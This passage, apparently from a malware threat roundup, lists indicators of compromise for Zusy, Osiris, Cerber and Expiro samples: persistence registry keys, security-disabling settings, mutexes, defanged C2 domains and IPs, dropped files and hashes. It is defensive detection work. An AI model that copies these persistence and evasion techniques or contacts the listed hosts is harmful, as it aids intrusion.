\"winver.exe.\" When the user accesses a banking website, it displays a form to trick the user into submitting personal information. \nWin.Malware.Osiris-7191711-1 | Malware | Osiris is a banking trojan derived from the Kronos banking trojan and is known to include features such as the ability to communicate with its command and control (C2) servers via Tor and the ability to intercept credentials typed into web forms. \nWin.Dropper.Cerber-7192026-0 | Dropper | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, this is no longer the case. \nWin.Virus.Expiro-7192043-0 | Virus | Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks. \nWin.Malware.Neurevt-7192122-0 | Malware | Neurevt, also known as BetaBot, is a remote access trojan that employs multiple anti-debug and anti-analysis techniques to attempt to avoid detection. \nDoc.Dropper.Emotet-7181950-0 | Dropper | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.Zusy-7191579-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: EEFEB657 ` | 82 \nMutexes | Occurrences \n---|--- \n`EEFEB657` | 87 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]218[.]185[.]162` | 54 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`brureservtestot[.]cc` | 57 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\AppData\\LocalLow\\EEFEB657` | 84 \n`%APPDATA%\\EEFEB657` | 82 \n`%APPDATA%\\EEFEB657\\bin.exe` | 82 \n \n#### File Hashes\n\n` 027ecc7f1e2d38d420486e9e0fe9d50bdceb8b50512258a922e69f55e0c18ec7 0a72c56814a288218c9346115935828be03e870fa858a721f738af4dab311205 0a9fd449b13193c771c2d401dd6538cab6dbb2c37e0573b05cc72802b90687cf 0b1fa36c3ae5bdb7c52c40e08566cceac37965265e5b2552fdf121add431ce45 0ce401aa748f86238016408aa5c7b082a83499a2cbf2d5a1370b3bef8b983be1 1266c2bccc5fa61af8b611d3c7f210b11fed7d22dbb24305bf6003b1891399fe 12ef657ff31b48b90fbb20b212643f7aa62b66dae80cd19feed7356089f18451 149e17e85475bf4f6b4be6c0f1924e8554ec982f949fcb833c8c6bc3a7673669 1a0d6dda8e405f9342fadc87a1a6b395250bfcf910f5e2e4cfba806de2b58eee 1b3ddf7b2a71290a0a86e974a323dde16999e7eaa2be2b8cd63c066a7ba6a052 1fa747673986b53ed65fa0a6b39a024ef02191966184a6fd8844e742fdbc3d58 22b172ead1618e0c49a6d94c4da6c7ba1d401549276bc3a7f3d78c18909e6793 2b9b82e7ee0d8661b2268f83a010e8379e28930cc7f9f224d06fcd37b48f566d 2ba984bf6a2e039225b78faf309d087db56a6a2eac5efc73f5f20ff941c58442 2c33aa852da4527f49dae1e6bb1940b4c7cd2c814da0a90ab8a2a5de5fee6726 2c594bcf891b90e24c8bd445d5ddbe9cb50f5d101d559d564ab8246535d2af53 306774877254b8ca51a2bf446834cc34126ac56ebaf9d935442c25e533485fc1 38efe6d2c2e264e83d54cebc4bb14766c344741e39b510b027882d1ef2bbb798 43aee0e0761a3e90aa35d3401634397be8d1691d88ed2bdaaf2f60c915de53e2 467e66e8fc95c740cc3beee432d6a5e85bc533aa6dd609865376dacf0a0ef6e7 47bc6db08ad7826b5a68644d6f013405e4e6842525b8a4d05a2abdabfd735fc4 484f52c4598eddc67147f8558c9bf9701d1c4d2f5bcc1b619a43422863d1e8ce 48624a37bd7f3faacc3d56c106a40189c413dc4ec4407c00a1034578cfb6a9b3 4a3a67a893cf7e49a5aef587d840867589841e93ae7f418019d6f94daba58c47 4bd1deaa13a4a9cef75f84dba895645a24ac7f4b4bd69d22ea5800a3c682cc54 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4u15Rz65tAA/XZddgxYFSlI/AAAAAAAACt0/c4t_kH8jhUEQEz011XGkTQNN5jhgH0sWgCLcBGAsYHQ/s1600/484f52c4598eddc67147f8558c9bf9701d1c4d2f5bcc1b619a43422863d1e8ce_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-i65rPHuheuE/XZddvf8boEI/AAAAAAAACt4/qqj9VP2GX9QS_ysbtho1KxieEbpffk_iwCLcBGAsYHQ/s1600/74e955ce1d18be739ac0292e506146820140ba5e40cc15cfc142fdb40553174b_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ahFkjjuMKQk/XZdd0sofcnI/AAAAAAAACuA/Eqquits2mwonPN2PUSGRy9wVIAabFQp1ACLcBGAsYHQ/s1600/2b32ffb0a0bcb61882ac3907d11afd5428054ac7e9ee4aa6dabca24277e51dee_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Osiris-7191711-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: HideFileExt ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION \nValue Name: d41d8cd9 ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION \nValue Name: d41d8cd9 ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: d41d8cd9 ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: d41d8cd9 ` | 11 \nMutexes | Occurrences \n---|--- \n`Global\\d41d8cd98f00b204e9800998ecf8427e` | 11 \n`Global\\{B1F6EFF9-6297-200E-B1F6-F9EF29AA7A00}` | 11 \n`Global\\{BF6093C4-5FBA-D878-BF60-C4933C20A000}` | 9 \n`Global\\dd4b21e9ef71e1291183a46b913ae6f2` | 9 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`updateserver4[.]top` | 11 \n`updateserver7[.]top` | 11 \n`updateserver5[.]top` | 11 \n`updateserver9[.]top` | 11 \n`updateserver2[.]top` | 11 \n`updateserver8[.]top` | 11 \n`updateserver10[.]top` | 11 \n`updateserver6[.]top` | 11 \n`updateserver3[.]top` | 11 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\<profile ID>.default\\user.js` | 11 \n`%System32%\\CatRoot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb` | 9 \n`%APPDATA%\\Microsoft\\{56984C2C-8905-4BFA-8553-0BE17726FCD5}` | 4 \n`%APPDATA%\\Microsoft\\{56984C2C-8905-4BFA-8553-0BE17726FCD5}\\d41d8cd9.exe` | 4 \n`%APPDATA%\\Microsoft\\{56984C2C-8905-4BE2-8553-13E17726E4D5}` | 2 \n`%APPDATA%\\Microsoft\\{56984C2C-8905-4BE2-8553-13E17726E4D5}\\d41d8cd9.exe` | 2 \n`%APPDATA%\\Microsoft\\{9A96A2D0-FE36-485E-B81C-0132628C474C}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{03FFB58D-7238-49DA-9378-5224CBD1F546}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{575A5E0A-FD63-4DF1-BF50-033349A4ADA1}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{33C67668-6248-47D0-8FDF-197713CA89A1}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{FA144B4E-77DF-4C1F-A472-60E20FF489C2}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{507C47B0-1E13-4926-92BC-C40E8A4CB040}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{F807BD90-CAC5-40B0-828A-CA06ED52C5F4}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{780EBCFD-EADA-4438-9DC3-324538311844}\\dd4b21e9.exe` | 1 \n \n#### File Hashes\n\n` 05ba5705db7ff502d4422ea7d4ef32422d9b2c0966a42b6b3d76c126d51e846d 0aae22c6557c43cf199421eb6b367d23469909b5f860468c1e42b0e5730808d5 2c5fdc198324cc33dc93d20dc58195608661ed5c83cf10619efdbc1fddeb51e5 4c6f284b0be38d51af26ee87e687cbba32184e0b21203758419953e1f476e841 4f645f4ae3dcf8bfebf4dde1b6d20497ce25fbbc1f6f691d40a95d7bff7a2d6c 5ba866dbb2ace005cfa32382404ac0927695f52bedce0804564549e633be8318 6478b2ce18a6a7671a39aa254ba0c4aaf123a0f5b27e9c86e323b663332f18f8 6f2add6401f59d813de66bc1152240f2e7622e293a0b10c5a804790b7068195b 6f9d45cf7571949de6db54d2e4c642ae63e30ba0eaf4f3075b8cd36749171377 919d3b68ee264053ae4f0f3d9caf93c055c421dabdc419d5d52d09d089142498 f7ce779ae0308c0c0da8280d3182506eda97778e91969eb4ea86dc3bfddb12df `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-RPO_aJyoeEU/XZdeH2iYLUI/AAAAAAAACuI/SCBwjGCIJyIMAR-wF6oeU4AIzvdRArjxwCLcBGAsYHQ/s1600/0aae22c6557c43cf199421eb6b367d23469909b5f860468c1e42b0e5730808d5_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IIykQjPA0AM/XZdeLyj6vqI/AAAAAAAACuM/nVaobZBr2Ogna6OVzJQdW2pTI3IiybJZQCLcBGAsYHQ/s1600/0aae22c6557c43cf199421eb6b367d23469909b5f860468c1e42b0e5730808d5_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-gHb7-YxUIJc/XZdeQanDu9I/AAAAAAAACuQ/HMU0hlzxH4opqS3WS8lyDkCvCtTRNw2VwCLcBGAsYHQ/s1600/919d3b68ee264053ae4f0f3d9caf93c055c421dabdc419d5d52d09d089142498_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Cerber-7192026-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: Run ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\COMMAND PROCESSOR \nValue Name: AutoRun ` | 25 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: SCRNSAVE.EXE ` | 25 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} ` | 25 \n`<HKCU>\\PRINTERS\\DEFAULTS ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Magnify ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Magnify ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: wusa ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: wusa ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: LocationNotifications ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: FlashPlayerApp ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: FlashPlayerApp ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: DWWIN ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: DWWIN ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: mshta ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: mshta ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoconv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: autoconv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: RMActivate_isv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: RMActivate_isv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: eventcreate ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: eventcreate ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: w32tm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: w32tm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: netbtugc ` | 1 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 25 \n`shell.{785F99DE-E95E-3921-EE78-D7777849AA01}` | 1 \n`shell.{967822DD-7042-E624-BEA7-C7EF520E90F5}` | 1 \n`shell.{A92873EC-3840-982A-DA5D-DDDC12AA8495}` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`31[.]184[.]234[.]0/25` | 25 \n`216[.]239[.]34[.]21` | 8 \n`216[.]239[.]32[.]21` | 7 \n`216[.]239[.]36[.]21` | 5 \n`216[.]239[.]38[.]21` | 5 \n`54[.]88[.]175[.]149` | 3 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipinfo[.]io` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}` | 25 \n`%TEMP%\\# DECRYPT MY FILES #.html` | 3 \n`%TEMP%\\# DECRYPT MY FILES #.txt` | 3 \n`%TEMP%\\# DECRYPT MY FILES #.url` | 3 \n`%TEMP%\\# DECRYPT MY FILES #.vbs` | 3 \n`%HOMEPATH%\\# DECRYPT MY FILES #.html` | 2 \n`%HOMEPATH%\\# DECRYPT MY FILES #.txt` | 2 \n`%HOMEPATH%\\# DECRYPT MY FILES #.url` | 2 \n`%HOMEPATH%\\# DECRYPT MY FILES #.vbs` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Magnify.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\Magnify.exe` | 2 \n`%System32%\\Tasks\\Magnify` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\wusa.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\wusa.exe` | 2 \n`%System32%\\Tasks\\wusa` | 2 \n`%System32%\\Tasks\\mtstocom` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\odbcconf.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\odbcconf.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\netbtugc.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\netbtugc.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\expand.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\expand.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\AdapterTroubleshooter.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\AdapterTroubleshooter.exe` | 1 \n`%System32%\\Tasks\\autoconv` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 151143935c4283f66a837eca1761400ab0573929e04217a5be0286b28eeb9d15 1736c692db984e5ceb7e15a127f2478400a78c30785fd3c195ae4d9468b80259 185f85a2fbc3e27f87b099ff50a1f03f89e724e7927ec9edac4c4416dc87c109 1da732e9670f73e980723ea167abb29c5b553603c3804ec4bb9a03a4d506e8a4 3a6ca5a46ac5ac3ef7972b22e2fa5cdc4af2e137150691ed1b7a15b1ce9030a4 3c7e1a50d31138b53165e98d7bc2ba570304359bb4f7baab7ded17cc3fb3bc4c 4574e5aeda39aadfadb399654d2a6db00884be85b0882fb0acc4dbf14153ca0e 4e242ff308fc31ada637861fed73373c30eb2d5ecfda92760498fcbe30a9bb07 503baff89f763142c5b49a527972c7119be3f95fcc8cc2a1cde8bb71fd76cd02 561caadf62f59ee8dfd6d9c97e5692875458c55b3e2d53ba43e9496c40ee0824 5dbfa76bd1edb0ae7a516a08c760e2234506d64ae7c905f8e0e8830d74ef8613 65afc018d8cdcc9ec4756e98000265e3ecc3e394b7e5d493dfd6d106cc15118a 6971a5b1aa7e57abad2939f4be1a92651ea7ac12251b804ae17f2ecb1e1bf200 70b5c51e692dcd2f432c05170f7f823fdfd5b6857267117a92fe9d358a7026ed 84a45eec021015ee2eeb5acb7251f3c50c626b41bf47b8fce7c822253e175c64 999a1e5659ac864771ad420c7cad50de5b5118adb5abb80ffe18ad28c932f5a0 a51de392aae3ade74991dd86b1d205c2cc5ecb0752cac2a02c95d61ff14a558c a80ace30082b76edb75d6c9a4f9165af721a8f8b13ac0862bc438589e0af01bd a8fe11512ba3e48b178ad9ef994f48ec581394e69cbdb808f15c1432a762c636 b1e46c28ddff91c0d586933b500ce29bcf83fc094864c4227b6e70fa1981f064 b7cf83e8596736ced202a1de5e67fbaa5bdf9074697d548fdd83800802732ec4 b8c85a34ed5ccfe058c8ba65606add1efdcfe694d0f32e6b91e4b977da1392a8 bd68985801dd6b820c3a0c21883aa4ace809b2a62cbba278ac3a4d53166bcf85 cc1efac0bf7786ea4bbd4963d78aee4498e034dd778adce6977eca3d78666483 d3080983742d3deacdbc53a43b1482cfe1573ec8d957fba0f456a676dca3bd90 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Kmwm7kXL8Ns/XZdfJq4vreI/AAAAAAAACuk/WOVujTC03JM3dM-kQHru22Tj4kR4RC9RQCLcBGAsYHQ/s1600/bd68985801dd6b820c3a0c21883aa4ace809b2a62cbba278ac3a4d53166bcf85_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-MRt4ru8qx8w/XZdfO4C1MII/AAAAAAAACuo/zNE3AakVS3MgxWB5thlGv50WsYL-XH6fgCLcBGAsYHQ/s1600/bd68985801dd6b820c3a0c21883aa4ace809b2a62cbba278ac3a4d53166bcf85_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Virus.Expiro-7192043-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_32 \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_32 \nValue Name: Start ` | 8 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusOverride ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallDisableNotify ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallOverride ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UacDisableNotify ` | 5 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DoNotAllowExceptions ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DisableNotifications ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION \nValue Name: jfghdug_ooetvtgk ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: JudCsgdy ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 5 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Userinit ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Userinit ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_64 \nValue Name: Type ` | 3 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_64 \nValue Name: Start ` | 3 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Start ` | 1 \nMutexes | Occurrences \n---|--- \n`SetupLauncher` | 12 \n`Global\\<random guid>` | 11 \n`gazavat-svc` | 8 \n`kkq-vx_mtx<number, matching [0-9]{1,2}>` | 8 \n`{7930D12C-1D38-EB63-89CF-4C8161B79ED4}` | 5 \n`{79345B6A-421F-2958-EA08-07396ADB9E27}` | 5 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]10[.]110` | 5 \n`87[.]106[.]190[.]153` | 4 \n`18[.]213[.]250[.]117` | 2 \n`91[.]195[.]240[.]126` | 2 \n`208[.]100[.]26[.]251` | 1 \n`18[.]215[.]128[.]143` | 1 \n`46[.]165[.]220[.]145` | 1 \n`46[.]165[.]254[.]198` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`atw82ye63ymdp[.]com` | 3 \n`xxsmtenwak[.]com` | 3 \n`grbjgfprk[.]com` | 3 \n`ydchosmhwljjrq[.]com` | 3 \n`ygqqaluei[.]com` | 3 \n`wwyreaohjbdyrajxif[.]com` | 3 \n`bekvfkxfh[.]com` | 3 \n`caosusubld[.]com` | 3 \n`warylmiwgo[.]com` | 3 \n`xomeommdilsq[.]com` | 3 \n`mdofetubarhorbvauf[.]com` | 3 \n`gfaronvw[.]com` | 1 \n`wstujheiancyv[.]com` | 1 \n`kbivgyaakcntdet[.]com` | 1 \n`dvwtcefqgfnixlrdb[.]com` | 1 \n`yrkbpnnlxrxrbpett[.]com` | 1 \n`oawvuycoy[.]com` | 1 \n`citnngljfbhbqtlqlrn[.]com` | 1 \n`bungetragecomedy9238[.]com` | 1 \n`oeuwldhkrnvxg[.]com` | 1 \n`kbodfwsbgfmoneuoj[.]com` | 1 \n`wdgqvaya[.]com` | 1 \n`ypwosgnjytynbqin[.]com` | 1 \n`jlaabpmergjoflssyg[.]com` | 1 \n`ausprcogpngdpkaf[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe` | 8 \n`%System32%\\alg.exe` | 8 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\ngen_service.log` | 8 \n`%SystemRoot%\\SysWOW64\\svchost.exe` | 8 \n`%System32%\\<random, matching '[a-z]{8}'>.tmp` | 8 \n`%SystemRoot%\\microsoft.net\\framework\\v2.0.50727\\<random, matching '[a-z]{8}'>.tmp` | 8 \n`%LOCALAPPDATA%\\bolpidti\\judcsgdy.exe` | 5 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\judcsgdy.exe` | 5 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\ngen_service.lock` | 5 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\ngenservicelock.dat` | 5 \n`%LOCALAPPDATA%\\bolpidti` | 4 \n`%SystemRoot%\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorsvw.exe` | 3 \n`%SystemRoot%\\Microsoft.NET\\Framework64\\v2.0.50727\\ngen_service.log` | 3 \n`\\TEMP\\ShMnr23` | 3 \n`%SystemRoot%\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe` | 1 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe` | 1 \n`%SystemRoot%\\SysWOW64\\cjnnhbik.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\hmdklpnd.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\ghnjiafh.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\nojnfemc.tmp` | 1 \n`\\TEMP\\emf` | 1 \n`\\TEMP\\J3OHIb3` | 1 \n`%SystemRoot%\\SysWOW64\\ggaiaabg.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\elmmpkjb.tmp` | 1 \n`%SystemRoot%\\microsoft.net\\framework64\\v2.0.50727\\jjicllfe.tmp` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 08c199483a9569dbe74565c65ab0dfe038338ffe0c37061316a3a45116a9adb0 0b75593bf5cec1a4e6beecce8927ba895307c03d22387611fb6ced7805c2fa7b 293263135eb196a8027f6aea0f74038d60b848103f09db6d39e55b763d6bf26a 29ec1dfc85cfed46ccf8a53ca2e9f207cb126f6cec92a3b829ae61590bea1b1c 32ed07783188242c60837a208a6ebab9e37fa69fb69da9b28629c3e3971ccfa6 36e5bd8e4a5c7758dd28acda1ad479bfbfb268ca1c5339b4e9953daea48392ac 63530b594d1605211d405951823a3f5ac249660aa0ca542cb00247652dc3b544 664bd013762c59a6f0b0c8fbd7dbed06f971d2dfbc2921e10faf8b5e8aba2e8a c075f037fea0578197e56a520708152779a9332195b96a52bac64ff10a914d82 d28f2744b436cb2816ee6a63a44e2cfd4f952483b65c026ea8b4f384cc6b7e5e ea5a419cb19fc22c11d3751f0560f049631571b99c33d37482ddbca1ee4e3d6f f2fffb85b3e49c138128ef141b69a49fd09e3c7362ed8beed43dc6c46deadbcb f5fec4cf85c3e2c936455b0f0ec8a6cbbb138dfa5e31db4920037f9baf46ab65 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  